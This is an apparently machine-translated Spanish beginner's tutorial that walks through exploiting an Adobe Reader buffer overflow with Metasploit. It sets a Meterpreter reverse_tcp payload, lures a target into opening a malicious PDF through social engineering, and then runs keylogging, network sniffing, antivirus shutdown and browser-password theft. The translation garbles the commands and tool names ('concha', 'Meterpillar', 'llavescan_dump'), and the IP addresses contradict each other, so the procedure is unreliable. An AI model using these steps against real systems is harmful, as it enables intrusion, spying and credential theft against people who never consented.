Explorando Metasploit: una guía para principiantes

medidor de metasploit
medidor de metasploit

¿Siempre quiso aprender a usar Metasploit pero no sabe por dónde empezar? ¡No busques más! En este artículo, lo guiaremos paso a paso a través de las funciones de Metasploit y le mostraremos cómo usar esta poderosa herramienta para probar la seguridad de sus sistemas.

Tanto si eres principiante como si tienes experiencia en seguridad informática, ¡este artículo es para ti! Prepárate para convertirte en un experto en el uso de Metasploit en poco tiempo.

¿Qué es el marco Metasploit?

Imagínese poder acceder a cualquier sistema informático del mundo, ¿le parece inalcanzable? Bueno, ahí es donde entra en juego el marco Metasploit.

Metasploit es una herramienta increíblemente poderosa que le permite explotar vulnerabilidades de seguridad en los sistemas informáticos. Lo utilizan los profesionales de la seguridad para probar la seguridad de sus propios sistemas, pero también los piratas informáticos para acceder a los sistemas de otras personas.

 

Contiene una gran base de datos de módulos de explotación, cargas útiles y scripts posteriores a la explotación que se pueden utilizar para automatizar las pruebas de seguridad.

Con Metasploit, puedes realizar pruebas de penetración en tus propios sistemas para descubrir vulnerabilidades antes de que lo haga un hacker.

En pocas palabras, Metasploit es una herramienta esencial para cualquier persona interesada en la seguridad informática, le brinda los medios para convertirse en un hacker ético y proteger eficazmente sus sistemas.

Que podemos hacer con Metasploit

El Framework le permite hacer muchas cosas como:

  • Escanee y recopile información sobre una máquina de destino.
  • Detectar y explotar vulnerabilidades.
  • Aumentar los privilegios de un sistema operativo.
  • Instale una puerta trasera para mantener el acceso persistente.
  • Utilice la técnica "Fuzzing" para probar la solidez del software.
  • Utilice herramientas de evasión para eludir el software de seguridad.
  • Use cargas útiles para ejecutar comandos de forma remota en sistemas comprometidos.
  • Utilice herramientas dinámicas para propagar el acceso a otros sistemas conectados.
  • Borre rastros y registros para ocultar actividades maliciosas.

Principales componentes del framework Metasploit

El marco Metasploit es una herramienta increíblemente poderosa, pero para aprovecharlo al máximo, es importante comprender los diferentes componentes que lo componen.

Estos son algunos de los elementos principales de Metasploit que lo ayudarán a comprender cómo funciona esta herramienta:

  • MSFconsola : Esta es la interfaz principal de Metasploit, aquí es donde puedes emitir comandos e interactuar con los diferentes módulos. Es donde pasarás la mayor parte de tu tiempo cuando trabajes con Metasploit.
  • Módulos operativos : Estos son los módulos que le permiten explotar las vulnerabilidades descubiertas en los sistemas de destino. Hay módulos para vulnerabilidades de Windows, Linux y muchos otros sistemas operativos.
  • Cargas útiles : Las cargas útiles son fragmentos de código que se ejecutan en sistemas comprometidos para realizar tareas específicas, como ejecutar comandos remotos, instalar una puerta trasera, etc.
  • Módulos postoperatorios : estos módulos le permiten recopilar información sobre sistemas comprometidos, mantener un acceso persistente, eludir las protecciones de seguridad y más.
  • Módulos auxiliares : estos módulos se utilizan para tareas específicas, como escanear puertos y recuperar información de destino.
  • Módulos de secuencias de comandos : Estos módulos le permiten ejecutar scripts para automatizar tareas específicas, como exportar datos, crear informes, etc.

Al comprender estos componentes clave, podrá aprovechar al máximo Metasploit para probar la seguridad de sus sistemas.

¿Comandos básicos para usar Metasploit?

Pasamos ahora a la parte más interesante: usar Metasploit.

Estos son los pasos básicos para explotar un sistema con Metasploit:

  1. Recopile información sobre el objetivo, como la versión del sistema operativo y los servicios de red instalados. Esta información se puede recuperar utilizando herramientas de escaneo de puertos y huellas, como Nmap, Maltego y Nessus.
  2. Elija y configure un exploit adecuado en función de la información recopilada.
  3. Compruebe si el sistema de destino es susceptible al exploit elegido mediante comandos de verificación.
  4. Elija y configure una carga útil adecuada.
  5. Ejecute el exploit con los ajustes configurados para intentar explotar la vulnerabilidad.

Explotar lado

Los comandos que veremos en la siguiente sección se utilizan para seleccionar y configurar un exploit para un objetivo específico antes de ejecutarlo.

Es importante comprender las opciones de cada exploit y configurarlas adecuadamente para maximizar las posibilidades de éxito del exploit.

Estos son los comandos básicos para usar los exploits de Metasploit:

  • Ver todos los exploits disponibles: show exploits
  • Busque un exploit específico: search nom_exploit
  • Seleccione un logro: use nom_exploit
  • Obtener información sobre un exploit: info nom_exploit
  • Vea las opciones de un exploit: show options

Lado de carga útil

Las cargas útiles se utilizan para definir qué hará el exploit una vez que tenga éxito. Hay muchos tipos de cargas útiles, que van desde la simple ejecución de comandos hasta la instalación remota de shell. Es importante elegir la carga útil adecuada para cada situación y configurarla correctamente para maximizar las posibilidades de una explotación exitosa.

Aquí se explica cómo usar las cargas útiles de Metasploit:

  • Mostrar todas las cargas útiles disponibles: show payloads
  • Seleccione una carga útil específica: set PAYLOAD nom_payload
  • Vea las opciones de carga útil para la configuración: show options

En general

  • Adquirir ayuda: ayuda
  • Conoce la versión de Metasploit: versión
  • Enumere todos los exploits, módulos y listas de reproducción: Buscar
  • Salir de Metasploit: renuncia

Instalar y usar Metasploit

¿Listo para poner a prueba tus habilidades de seguridad informática? ¡Así que escucha!

Para configurar un entorno de prueba adecuado, debe descargar e instalar kali linux virtualmente con vmware. ¿Y adivina qué? Metasploit ya está preinstalado para su disfrute.

Luego descarga e instala Windows XP para crear una segunda máquina virtual con la que experimentar.

¡Pero eso no es todo! En esta segunda máquina instalaremos una versión vulnerable de la aplicación Adobe Acrobat Reader. Sí, escuchaste bien, ¡vulnerable!

Esta vulnerabilidad afecta a Adobe Reader v9.0.0 (Windows XP SP3) y Adobe Reader v8.1.2 (Windows SP2). Y ojo, porque en determinados casos, abrir un archivo PDF con Adobe Acrobat Reader puede provocar un “desbordamiento de búfer” y permitir así que una persona malintencionada tome el control de una máquina de forma remota.

Una vez que hayas instalado tus herramientas de prueba, inicia tu consola Metasploit y muéstranos de qué estás hecho. Y recuerde, ¡aprender es divertido cuando es emocionante!

Explotar la falla de Adobe Acrobat Reader con Metasploit

Cargue la carga útil

¿Estás listo para saltar al mundo de Metasploit? ¡Sigue estos sencillos pasos para comenzar tu aventura!

Para comenzar, abra msfconsole.

  • Haga clic en Aplicaciones.
  • Luego, seleccione Herramientas de minería.
  • Finalmente, haga clic en Metasploit Framework.

De lo contrario, utilice el comando "msfconsole" en una terminal.

 

En unos segundos, aparecerá una consola frente a ti.

Ahora escribe los siguientes comandos:

buscar adobe_jbig2decode // buscar adobe exploit
usar exploit/windows/browser/adobe_jbig2decode // seleccione explotar
explotar información/windows/navegador/adobe_jbig2decode
Mostrar opciones
establezca SRVHOST 192.168.64.5 // la dirección IP del servidor utilizado
conjunto SRVPORT 80
set URIPATH //esta es la URL utilizada para el exploit
mostrar objetivos
establecer objetivos 0
mostrar cargas útiles
establecer CARGA ÚTIL windows/meterpreter/reverse_tcp
establecer LHOST 192.168.64.5

Aquí usamos una carga útil llamada "reverse_tcp". Esto significa que enviamos un fragmento de código que se ejecutará en la máquina de destino una vez que hayamos explotado un agujero de seguridad. Esto nos permitirá conectarnos de forma remota a la máquina de destino, incluso si está protegida por un firewall.

Nota:  En este caso, la dirección IP 192.168.230.128 es la dirección de nuestra máquina virtual que contiene el servidor que almacenará el archivo PDF infectado. Esto significa que usaremos esta dirección IP para acceder a este servidor virtual y descargar el archivo PDF infectado para realizar nuestras pruebas de seguridad.

Ejecutar el exploit

El módulo está correctamente configurado, podemos lanzar el ataque con el siguiente comando:

msf> explotar
[*] Exploit ejecutándose como trabajo en segundo plano.
[*] Se inició el controlador inverso en 192.168.230.128:4444
[*] Usando URL: http://192.168.64.5:8080/
[*] Servidor iniciado.

Para configurar nuestra prueba de seguridad, iniciaremos un servidor web temporal utilizando la dirección IP 192.168.64.5.

Nuestro servidor web temporal se inicia con la siguiente dirección IP: 192.168.64.5.

El siguiente paso es utilizar la técnica conocida comoIngeniería social para enviar esta dirección a una persona objetivo. Cuando esta persona haga clic en el enlace, se le ofrecerá descargar un archivo PDF malicioso. Si la persona acepta abrirlo con Adobe Reader, Metasploit le dirá que la explotación de la vulnerabilidad fue exitosa.

Es importante tener en cuenta que la dirección IP 192.168.230.1 es la de nuestra segunda máquina virtual en Windows XP que está configurado para ser vulnerable. Fue en esta máquina donde instalamos una versión vulnerable de Adobe Acrobat Reader para realizar nuestras pruebas de seguridad.

Como se trata de una prueba, subiremos el archivo PDF malicioso con nuestra propia cuenta.

Abrir una sesión de Meterpillar

Todo lo que tenemos que hacer es abrir un Sesión de Meterpreter remotamente en la máquina vulnerable:

msf> sesiones -i 1
[*] Iniciando interacción con 1…

Ahora tenemos el control total de la segunda máquina. Entonces podemos hacer lo que queramos.

Por ejemplo, podemos tomar capturas de pantalla de forma remota usando la extensión Espia de Meterpreter:

meterpreter> usar espia
Cargando extensión espia… éxito.
captura de pantalla hack.jpg Dónde empezar un keylogger para capturar todo lo escrito en el teclado:
keycan_start
llavescan_dump
llavescan_stop

O espiar la red de la víctima:

usar rastreador
sniffer_interfaces //las interfaces disponibles
sniffer_start 2 //Empezamos la captura en la interfaz 2
sniffer_stats 2 //Saber cuántos paquetes capturados
sniffer_dump 2 nombre de archivo
// recuperar paquetes capturados

O abra un cuadro de diálogo del símbolo del sistema:

meterpreter> concha
Proceso 892 creado.
Se creó el canal 1.
(C) Copyright 1985-2001 Microsoft Corp.
C: Documents and Settings \ admin \ Mis documentos>

Algunos comandos de Meterpreter

  • ejecutar enum_firefox: este comando le permite recuperar toda la información relacionada con Firefox (cookies, historial, contraseña guardada).
  • ejecutar get_application_list:  este comando se utiliza para averiguar las aplicaciones instaladas en la computadora de la víctima.
  • ejecutar killav: desactiva el antivirus.
  • ejecutar kitrap0cd: automatiza la escalada de privilegios.

Hay una comando cien Meterpreter que puede ser muy útil...
Por supuesto, el método que se describe a continuación se puede utilizar para otras fallas que afectan a diferentes programas. Es posible enumerar todos los exploits conocidos con el siguiente comando: Mostrar exploits

Puede hacer otra prueba con una vulnerabilidad más reciente, es la vulnerabilidad de día cero en Internet Explorer.
Aquí está la explicación completa en esta publicación: Cómo explotar la falla 0day de Internet Explorer con Metasploit.

Conclusión

¡Acabas de descubrir el increíble potencial de Metasploit! No es sólo una herramienta para explotar vulnerabilidades en Adobe o Internet Explorer, sino que hay cientos de exploits disponibles para atacar todo tipo de máquinas.

Metasploit es una poderosa herramienta que continúa evolucionando y sorprendiendo a los profesionales de la seguridad TI. Esperamos que a través de esta guía informática hayas podido dominar los comandos básicos de este increíble Framework.

Y si quieres saber más sobre Metasploit o tienes ideas para mejorar esta página, ¡no dudes en dejar un comentario! Siempre estaremos felices de escuchar sus opiniones y ayudarlo a dominar mejor las herramientas de TI.